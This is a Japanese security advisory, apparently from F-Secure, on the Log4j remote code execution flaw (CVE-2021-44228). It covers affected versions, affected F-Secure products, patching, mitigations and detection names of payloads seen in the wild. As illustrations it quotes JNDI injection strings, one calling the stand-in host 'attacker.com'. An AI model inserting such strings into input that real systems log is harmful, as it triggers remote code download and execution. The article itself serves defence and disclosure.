12月10日に発見されたLog4jライブラリの脆弱性は、世界中のソフトウェアベンダーやサービスプロバイダを震撼させています。MicrosoftのMinecraftからEコマースのプラットフォームまで、様々なソフトウェアのログメッセージを処理する標準的な方法に脆弱性があり、すでに攻撃者の攻撃を受けています。
今、脆弱性を持つアプリの中にに存在するリスクの深刻さ説明することはほとんど不可能です。脆弱性をターゲットにしたユーザー制御の文字列が記録されると、リモートでエクスプロイトを実行することができます。最も簡単に言えば、攻撃者がこの脆弱性を利用し、対象となるシステムにリモートでコードを取得して実行させることができるということです。第2段階、つまり悪意のあるコードが何をするかは、完全に攻撃者次第なのです。
Apache Log4jの脆弱性とは
Apache Log4jは、Javaベースのロギングライブラリで、このオープンソースのロギングライブラリ「Apache Log4j」に、任意のリモートコードが実行できてしまう脆弱性がコード実行の脆弱性 (CVE-2021-44228) が発表されました。
https://www.jpcert.or.jp/at/2021/at210050.html
Apache Log4jは、オープンソースとしてApache Webサーバを利用する多くのソフトウェアベンダーの製品やオンラインサービスプロバイダーに使用されています。また、Javaアプリケーションに明示的にLog4jを組み込んでいない場合も、さまざまなフレームワークやコンポーネントがLog4jを採用しているため、慎重な確認が求められます。
影響を受けるシステム
- Apache Log4j 2.15.0 より前の 2 系のバージョン
- Apache Log4j 2.15.0-rc1 (Apache Log4j 2.15.0 の出荷候補版)
なお、すでに EOL (製品ライフサイクルの終了) となているApache Log4j 1系に関しては、Lookup 機能が実装されていないため、影響を受けないとの情報が確認されています。
企業/一般ユーザーへの影響
既述のようにApache Log4jは多くのソフトウェアベンダーやオンラインサービスで使用されており、これらの製品/サービスを利用している企業/個人ユーザーにも影響が及びます。ソフトウェアベンダーやサービスベンダーは続々と自社製品/サービスがLog4jによってどのように影響を受けるかを評価し、対応のためのパッチの提供を開始しています。この脆弱性の影響を受けた例の1つであるJava版Minecraftではサーバーとクライアント両方での対策が必要となり、ユーザー側でのバージョンアップも呼びかけられています。
破滅的な事態
この脆弱性によってもたらされる「破滅的な事態 (perfect storm)」は、企業のソフトウェアをいくつものレイヤーにわたって保護することの難しさを改めて認識させるものです。古いバージョンのJavaを含むレガシーソフトウェアでは、多くの企業が独自のパッチを開発しなければならなかったり、すぐにパッチを適用することができなかったりします。また、攻撃の脅威度が非常に高く、ロギングが不可欠な時期に、Log4jのロギング機能にリアルタイムで正しくパッチを適用するという課題もあり、それが更に事態を複雑なものにしています。
米国CISA (Cybersecurity and Infrastructure Security Agency)は、推奨されるすべての対応策は「直ちに」実行されるべきであると、同機関のブログにおいて警鐘を鳴らしています。
ユーザー一人ひとりが実行できる対策は、利用している様々なオンラインサービスのアップデートが適用可能になった際に、直ちにそれをインストールすること以外にはほとんどありません。しかし、企業は、自社のシステムを保護しながら、修正プログラムを提供するために絶え間ない努力をしています。また、脆弱性が解消された後も、被害を受けたシステム内でインシデントが発生していないかどうかを評価するための措置を講じる必要があります。
あらゆるところに存在する脆弱性
Log4Jライブラリを使用していないアプリケーションを見つけることは、使用しているアプリケーションを見つけることよりも難しいかもしれません。これは、攻撃者がどこにでも脆弱性を探しに行けることを意味します。
「使用しているテスラやiPhoneの名前を${jndi:ldap://url/a}に変更しないでください」と、F-SecureのCISO (最高情報セキュリティ責任者) であるErka Koivunen (エルカ・コイヴネン) は語っています。
Log4Jのフォーマット言語を使用すると、世界中の脆弱なアプリケーションのコードを引き起こす可能性があります。例えば、パッチが適用されていないシステムのMinecraftのチャットで「${jndi:ldap://attacker.com/pwnyourserver}」のようなフレーズを口にしただけで、Microsoft社のセキュリティの大炎上を引き起こす可能性があります。
影響を受けるF-Secure製品
エフセキュアでは、以下の製品がこの脆弱性の影響を受けることを確認しています。これらの製品はWindows版とLinux版の両方が影響を受けると考えられます。お使いの F-Secure 製品がインターネットに公開されている場合は、直ちに確認し、必要に応じてパッチを適用する必要があります。
- F-Secure Policy Manager
- F-Secure Policy Manager Proxy
- F-Secure Endpoint Proxy
- F-Secure Elements Connector
Q&A
Q: F-Secure製品にパッチを適用するにはどうすればいいのか?
A: エフセキュアは、この脆弱性に対する展開可能なセキュリティパッチを作成しました。 その手順と、この脆弱性に関する継続的な更新情報は、こちらでご覧いただけます。
Q: エフセキュアはこの脆弱性に対してどのような保護を提供しているのか?
A: F-Secure Elements Endpoint Protection (EPP) は、最新のローカルエクスプロイトファイルの検知で引き続き更新されていますが、エクスプロイトが起こりうる多くの方法を考慮すると、これは問題の一部しかカバーしていません。
EPPの検知は、通常通りエクスプロイト後の段階で見られるペイロードに対処し、通常のプロセスの一環としてさらに検知を追加していきます。
以下は、Log4jのエクスプロイトに関連して「自然界」で見られた悪意のあるペイロードです。
- TR/Drop.Cobacis.AL
- TR/Rozena.wrdej
- TR/PShell.Agent.SWR
- TR/Coblat.G1
- TR/AD.MeterpreterSC.rywng
これらの多くは既に数ヶ月前からF-Secure Elements EPPで検知可能となっていたものであり、ユーザーはこれらのペイロードからプロアクティブに保護されていることになります。
また、このエクスプロイトを使用する方法は複数あるため、他の検知方法も役立つ可能性があります。有効とされる検知方法のリストは、状況の進展に応じて更新されます。更なる対策については、次の項目をご確認ください。
Q: ベンダーを問わず、すべてのソフトウェアについて、一般的にどのような対策をとるべきなのか?
A: エフセキュアでは以下の対策をお薦めします。
- ネットワークへのアクセスを制限する、または信頼できるサイトに限定することが重要です。システムがインターネットに接続して悪意のあるコードを取得できなければ、攻撃は失敗します。
- 脆弱性に関連するパッチやその他の対策に関する情報があるかをソフトウェアベンダーに定期的に確認する。
- システムのアップデートを毎日確認し、利用可能なものがあれば早急に適用する。
- 脆弱性のあるシステムを特定するのに役立つF-Secure Elements Vulnerability Managementの導入を検討する。
- インストールされているシステムの脆弱なソフトウェアを検出し、パッチを適用することができるF-Secure Elements Endpoint ProtectionやF-Secure Business Suiteの導入を検討する。
カテゴリ